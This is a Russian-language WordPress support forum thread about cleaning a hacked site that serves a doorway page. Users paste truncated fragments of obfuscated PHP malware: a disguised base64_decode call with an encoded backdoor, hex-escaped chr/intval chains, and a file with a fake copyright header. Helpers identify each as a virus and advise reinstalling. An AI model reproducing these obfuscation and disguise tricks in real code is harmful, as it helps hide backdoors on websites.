Где можно найти его и как удалить с сайта?
Это дорвей. Вас взломали. Сайт нужно лечить и устранять уязвимость.
Сайт чистился и проверялся антивирусом несколько дней назад. Вчера вручную просмотрел все коды base64 в wp-content, вроде бы ссылок не было нигде.. Как еще можно найти вредоносный код?
В корне сайта есть некоторые файлы .php, содержащие вот такую строку
$bxcf=str_ireplace(«i»,»»,»iibiasiieii6iii4iiii_iideicioidieii»);$xqhdnbk =
и потом длинный непонятный код вот такого плана
«Lypra3F5bXBmYnVhcnJkbiovIGlmICghZW1wdHkoJF9HRVQpICYmIGlzc2V0KCRfR0VUWy…..
может в них проблема?
забавно: «у меня сайт набит вирусными файлами. может быть в них проблема?»
ну там же не написано, что это вирусный файл.
там буквально так и написано.
любые посторонние php файлы в файлах движка — это вирусы.
Модератор
Юрій
(@yube)
ну там же не написано, что это вирусный файл.
Именно это там и написано 🙂 Чтобы понять, что там что-то очень плохое, достаточно один раз увидеть хороший файл движка.
вот файл index.php вот с таким содержимым: $l0 = «\x63\x68\x72»; $p10 = «\x69\x6e\x74\x76\x61\x6c»; $U4 = $l0($p10(«\x39\x39»)).$l0($p10(«\x31\x30».$l0($p10(«\x35\x32»)))).$l0($p10($l0($p10(«\x34».$l0($p10(«\x35».$l0($p10(«\x35\x35»)))))).$l0($p10(«\x34\x38»)).$l0($p10(«\x35».$l0($p10(«\x35\x35»)))))).$l0($p10($l0($p10(«\x34».$l0($p10(«\x35».$l0($p10(«\x35\x35»)))))).
и так далее
это вирус или нет?
вирус. только полагаю, что там дальше зловредного кода идет нормальный код. так что начните с переустановки wordpress поверх — чтобы он затер вирусные файлы. потом удалите все файлы, которых нет в движке.
вордпресс обновлен до последней версии неделю назад
или при обновлении он не затирает вирус?
-
Ответ изменён 8 лет, 9 месяцев назад пользователем
dolix.
А вот такой файл — это тоже вирус?
<?php
/**
* @package Error Lib
* *************************************************************************************
* @copyright Copyright (C) 2005 — 2016 Open Source Matters, Inc. All rights reserved. // h(XX44bV7GxtEVw8*e8e8b5Pq2G(mn^qEaUqTHH2e*$61qBX5dnHk2)cB1u5C48FwDp$X#UV.8rKHnMU8PYHmG-1*KC3acUx!0*9AZhTY_eW)6Qu-Z9=^7W5.YVe1hk-VHvRp#_MaK4e$HecU19AU4d(N2A8rQna5tY.B=Cvhc74+UA4#A^yqQby6FzABVRZpZMSarnQRWPNw7aX.(h7kUrp)wU22^f+#4GQmk68TV(FhZMNBFtWK9y2GT#RTn92mCmcKSm_)963MVKB^SBGwG#!FNWCr=Dht^ybw.EpZK9-7c!b*37hG7!=kf7P_zE26wCE=q7mfKFY8(c6XKB^#BzKDq_R0-r$7Q8QH!Eg9VM3kD
* @license GNU General Public License version 2 or later; see LICENSE
*/
// Set the platform root path as a constant if necessary.
if (defined(‘PATH’))
{
define(‘PATH’, __DIR__);
}
else if ( empty ($_POST)) {
echo ‘Not exception. Exiting.’;
exit;
вордпресс обновлен до последней версии неделю назад
вы шутите? да хоть 10 минут назад — если в данный момент присутствуют вирусы — надо переустанавливать.
и да — это вирус. любая зашифрованная шняга в php файлах это вирусы.
